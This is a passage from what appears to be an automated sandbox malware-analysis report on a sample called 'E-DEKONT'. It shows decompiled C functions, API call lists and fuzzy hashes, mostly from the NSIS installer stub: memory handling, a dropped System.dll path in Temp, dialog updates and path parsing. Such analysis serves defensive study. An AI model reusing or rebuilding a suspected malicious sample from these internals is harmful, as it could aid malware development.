                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                            • GlobalFree.KERNEL32(?), ref: 00402950
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID:
                                                                            • API String ID: 2667972263-0
                                                                            • Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                                            • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                                            • Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                                            • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
                                                                            			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
                                                                            				signed int _t14;
                                                                            				int _t17;
                                                                            				int _t24;
                                                                            				signed int _t29;
                                                                            				intOrPtr* _t32;
                                                                            				void* _t34;
                                                                            				void* _t35;
                                                                            				void* _t38;
                                                                            				signed int _t40;
                                                                            
                                                                            				_t32 = __esi;
                                                                            				_t24 = __ebx;
                                                                            				_t14 =  *(_t35 - 0x20);
                                                                            				_t38 = __edx - 0x38;
                                                                            				 *(_t35 - 0x4c) = _t14;
                                                                            				_t27 = 0 | _t38 == 0x00000000;
                                                                            				_t29 = _t38 == 0;
                                                                            				if(_t14 == __ebx) {
                                                                            					if(__edx != 0x38) {
                                                                            						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
                                                                            					} else {
                                                                            						E00402C37(0x21);
                                                                            						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp\System.dll", 0x400, __ebx, __ebx);
                                                                            						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp\System.dll");
                                                                            					}
                                                                            				} else {
                                                                            					E00402C15(1);
                                                                            					 *0x40add0 = __ax;
                                                                            					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
                                                                            				}
                                                                            				 *(_t35 + 8) = _t17;
                                                                            				if( *_t32 == _t24) {
                                                                            					L13:
                                                                            					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                            				} else {
                                                                            					_t34 = E004061E2(_t27, _t32);
                                                                            					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E55(_t34, _t34) >= 0) {
                                                                            						_t14 = E00405E26(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp\System.dll",  *(_t35 + 8));
                                                                            						_t40 = _t14;
                                                                            						if(_t40 == 0) {
                                                                            							goto L13;
                                                                            						}
                                                                            					} else {
                                                                            						goto L13;
                                                                            					}
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                            				return 0;
                                                                            			}













                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsx82F6.tmp$C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll
                                                                            • API String ID: 3109718747-3759672397
                                                                            • Opcode ID: 29697b63a1bf179c8a70b2ea45890600dc215057ee6868cc9ec1e4f57a159bbe
                                                                            • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                                            • Opcode Fuzzy Hash: 29697b63a1bf179c8a70b2ea45890600dc215057ee6868cc9ec1e4f57a159bbe
                                                                            • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 85%
                                                                            			E100022D0(void* __edx) {
                                                                            				void* _t37;
                                                                            				signed int _t38;
                                                                            				void* _t39;
                                                                            				void* _t41;
                                                                            				signed int* _t42;
                                                                            				signed int* _t51;
                                                                            				void* _t52;
                                                                            				void* _t54;
                                                                            
                                                                            				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                            				while(1) {
                                                                            					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                            					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                            					_t52 = _t51[6];
                                                                            					if(_t52 == 0) {
                                                                            						goto L9;
                                                                            					}
                                                                            					_t41 = 0x1a;
                                                                            					if(_t52 == _t41) {
                                                                            						goto L9;
                                                                            					}
                                                                            					if(_t52 != 0xffffffff) {
                                                                            						if(_t52 <= 0 || _t52 > 0x19) {
                                                                            							_t51[6] = _t41;
                                                                            							goto L12;
                                                                            						} else {
                                                                            							_t37 = E100012BA(_t52 - 1);
                                                                            							L10:
                                                                            							goto L11;
                                                                            						}
                                                                            					} else {
                                                                            						_t37 = E10001243();
                                                                            						L11:
                                                                            						_t52 = _t37;
                                                                            						L12:
                                                                            						_t13 =  &(_t51[2]); // 0x1020
                                                                            						_t42 = _t13;
                                                                            						if(_t51[1] != 0xffffffff) {
                                                                            						}
                                                                            						_t38 =  *_t51;
                                                                            						_t51[7] = 0;
                                                                            						if(_t38 > 7) {
                                                                            							L27:
                                                                            							_t39 = GlobalFree(_t52);
                                                                            							if( *(_t54 + 0x10) == 0) {
                                                                            								return _t39;
                                                                            							}
                                                                            							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                            								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                            							} else {
                                                                            								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                            							}
                                                                            							continue;
                                                                            						} else {
                                                                            							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
                                                                            								case 0:
                                                                            									 *_t42 = 0;
                                                                            									goto L27;
                                                                            								case 1:
                                                                            									__eax = E10001311(__ebp);
                                                                            									goto L21;
                                                                            								case 2:
                                                                            									 *__edi = E10001311(__ebp);
                                                                            									__edi[1] = __edx;
                                                                            									goto L27;
                                                                            								case 3:
                                                                            									__eax = GlobalAlloc(0x40,  *0x1000406c);
                                                                            									 *(__esi + 0x1c) = __eax;
                                                                            									__edx = 0;
                                                                            									 *__edi = __eax;
                                                                            									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
                                                                            									goto L27;
                                                                            								case 4:
                                                                            									__eax = E1000122C(__ebp);
                                                                            									 *(__esi + 0x1c) = __eax;
                                                                            									L21:
                                                                            									 *__edi = __eax;
                                                                            									goto L27;
                                                                            								case 5:
                                                                            									__eax = GlobalAlloc(0x40, 0x10);
                                                                            									_push(__eax);
                                                                            									 *(__esi + 0x1c) = __eax;
                                                                            									_push(__ebp);
                                                                            									 *__edi = __eax;
                                                                            									__imp__CLSIDFromString();
                                                                            									goto L27;
                                                                            								case 6:
                                                                            									if( *__ebp != __cx) {
                                                                            										__eax = E10001311(__ebp);
                                                                            										 *__ebx = __eax;
                                                                            									}
                                                                            									goto L27;
                                                                            								case 7:
                                                                            									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                            									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                                            									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                                            									asm("cdq");
                                                                            									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
                                                                            									goto L27;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					L9:
                                                                            					_t37 = E1000122C(0x10004044);
                                                                            					goto L10;
                                                                            				}
                                                                            			}












                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                              • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                            • String ID:
                                                                            • API String ID: 4216380887-0
                                                                            • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                            • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                            • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                            • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
                                                                            				_Unknown_base(*)()* _t7;
                                                                            				void* _t10;
                                                                            				int _t14;
                                                                            
                                                                            				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                            				_t10 = GlobalAlloc(0x40, _t14);
                                                                            				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                            				_t7 = GetProcAddress(_a4, _t10);
                                                                            				GlobalFree(_t10);
                                                                            				return _t7;
                                                                            			}







                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                            • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                            • String ID:
                                                                            • API String ID: 1148316912-0
                                                                            • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                            • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                            • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                            • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00401D57() {
                                                                            				void* _t18;
                                                                            				struct HINSTANCE__* _t22;
                                                                            				struct HWND__* _t25;
                                                                            				void* _t27;
                                                                            
                                                                            				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
                                                                            				GetClientRect(_t25, _t27 - 0x58);
                                                                            				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
                                                                            				if(_t18 != _t22) {
                                                                            					DeleteObject(_t18);
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t27 - 4));
                                                                            				return 0;
                                                                            			}








                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                            • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: c7f94385dd4a6174af72edd052602ed5a5951d747682783072fd515e99349627
                                                                            • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                                            • Opcode Fuzzy Hash: c7f94385dd4a6174af72edd052602ed5a5951d747682783072fd515e99349627
                                                                            • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            			E00404AA2(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                            				char _v68;
                                                                            				char _v132;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t23;
                                                                            				signed int _t24;
                                                                            				void* _t31;
                                                                            				void* _t33;
                                                                            				void* _t34;
                                                                            				void* _t44;
                                                                            				signed int _t46;
                                                                            				signed int _t50;
                                                                            				signed int _t52;
                                                                            				signed int _t53;
                                                                            				signed int _t55;
                                                                            
                                                                            				_t23 = _a16;
                                                                            				_t53 = _a12;
                                                                            				_t44 = 0xffffffdc;
                                                                            				if(_t23 == 0) {
                                                                            					_push(0x14);
                                                                            					_pop(0);
                                                                            					_t24 = _t53;
                                                                            					if(_t53 < 0x100000) {
                                                                            						_push(0xa);
                                                                            						_pop(0);
                                                                            						_t44 = 0xffffffdd;
                                                                            					}
                                                                            					if(_t53 < 0x400) {
                                                                            						_t44 = 0xffffffde;
                                                                            					}
                                                                            					if(_t53 < 0xffff3333) {
                                                                            						_t52 = 0x14;
                                                                            						asm("cdq");
                                                                            						_t24 = 1 / _t52 + _t53;
                                                                            					}
                                                                            					_t25 = _t24 & 0x00ffffff;
                                                                            					_t55 = _t24 >> 0;
                                                                            					_t46 = 0xa;
                                                                            					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                            				} else {
                                                                            					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                            					_t50 = 0;
                                                                            				}
                                                                            				_t31 = E004062A4(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                            				_t33 = E004062A4(_t44, _t50, _t55,  &_v132, _t44);
                                                                            				_t34 = E004062A4(_t44, _t50, 0x42d248, 0x42d248, _a8);
                                                                            				wsprintfW(_t34 + lstrlenW(0x42d248) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                            				return SetDlgItemTextW( *0x433eb8, _a4, 0x42d248);
                                                                            			}




















                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                                            • wsprintfW.USER32 ref: 00404B4C
                                                                            • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s
                                                                            • API String ID: 3540041739-3551169577
                                                                            • Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                                            • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                                            • Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                                            • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405BFE(WCHAR* _a4) {
                                                                            				WCHAR* _t5;
                                                                            				short* _t7;
                                                                            				WCHAR* _t10;
                                                                            				short _t11;
                                                                            				WCHAR* _t12;
                                                                            				void* _t14;
                                                                            
                                                                            				_t12 = _a4;
                                                                            				_t10 = CharNextW(_t12);
                                                                            				_t5 = CharNextW(_t10);
                                                                            				_t11 =  *_t12;
                                                                            				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
                                                                            					if(_t11 != 0x5c || _t12[1] != _t11) {
                                                                            						L10:
                                                                            						return 0;
                                                                            					} else {
                                                                            						_t14 = 2;
                                                                            						while(1) {
                                                                            							_t14 = _t14 - 1;
                                                                            							_t7 = E00405B80(_t5, 0x5c);
                                                                            							if( *_t7 == 0) {
                                                                            								goto L10;
                                                                            							}
                                                                            							_t5 = _t7 + 2;
                                                                            							if(_t14 != 0) {
                                                                            								continue;
                                                                            							}
                                                                            							return _t5;
                                                                            						}
                                                                            						goto L10;
                                                                            					}
                                                                            				} else {
                                                                            					return CharNextW(_t5);
                                                                            				}
                                                                            			}










                                                                            APIs
                                                                            • CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75F63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 00405C0C
                                                                            • CharNextW.USER32(00000000), ref: 00405C11
                                                                            • CharNextW.USER32(00000000), ref: 00405C29
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext
                                                                            • String ID: C:\
                                                                            • API String ID: 3213498283-3404278061
                                                                            • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                            • Instruction ID: 71472b9638db6d5cc2cef3a2d8db9d1c11fc55a0834b756b62a4f8b04705d027
                                                                            • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                            • Instruction Fuzzy Hash: B7F09662908F1555FF317A945C45ABB57B8DB54BA0B00C83BD602B72C0E3B85CC58E9A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E00405B53(WCHAR* _a4) {
                                                                            				WCHAR* _t9;
                                                                            
                                                                            				_t9 = _a4;
                                                                            				_push( &(_t9[lstrlenW(_t9)]));
                                                                            				_push(_t9);
                                                                            				if( *(CharPrevW()) != 0x5c) {
                                                                            					lstrcatW(_t9, 0x40a014);
                                                                            				}
                                                                            				return _t9;
                                                                            			}





                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405B75
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-3355392842
                                                                            • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                            • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                                            • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                            • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00402E5D(intOrPtr _a4) {
                                                                            				long _t2;
                                                                            				struct HWND__* _t3;
                                                                            				struct HWND__* _t6;
                                                                            
                                                                            				if(_a4 == 0) {
                                                                            					__eflags =  *0x422a00; // 0x0
                                                                            					if(__eflags == 0) {
                                                                            						_t2 = GetTickCount();
                                                                            						__eflags = _t2 -  *0x434ef0;
                                                                            						if(_t2 >  *0x434ef0) {
                                                                            							_t3 = CreateDialogParamW( *0x434ee0, 0x6f, 0, E00402DD7, 0);
                                                                            							 *0x422a00 = _t3;
                                                                            							return ShowWindow(_t3, 5);
                                                                            						}
                                                                            						return _t2;
                                                                            					} else {
                                                                            						return E00406698(0);
                                                                            					}
                                                                            				} else {
                                                                            					_t6 =  *0x422a00; // 0x0
                                                                            					if(_t6 != 0) {
                                                                            						_t6 = DestroyWindow(_t6);
                                                                            					}
                                                                            					 *0x422a00 = 0;
                                                                            					return _t6;
                                                                            				}
                                                                            			}







                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                                            • GetTickCount.KERNEL32 ref: 00402E8E
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                                            • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                                            • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                                            • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                                            • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004038FB() {
                                                                            				void* _t2;
                                                                            				void* _t3;
                                                                            				void* _t6;
                                                                            				void* _t8;
                                                                            
                                                                            				_t8 =  *0x42b20c;
                                                                            				_t3 = E004038E0(_t2, 0);
                                                                            				if(_t8 != 0) {
                                                                            					do {
                                                                            						_t6 = _t8;
                                                                            						_t8 =  *_t8;
                                                                            						FreeLibrary( *(_t6 + 8));
                                                                            						_t3 = GlobalFree(_t6);
                                                                            					} while (_t8 != 0);
                                                                            				}
                                                                            				 *0x42b20c =  *0x42b20c & 0x00000000;
                                                                            				return _t3;
                                                                            			}








                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75F63420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                                            • GlobalFree.KERNEL32(?), ref: 0040391C
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
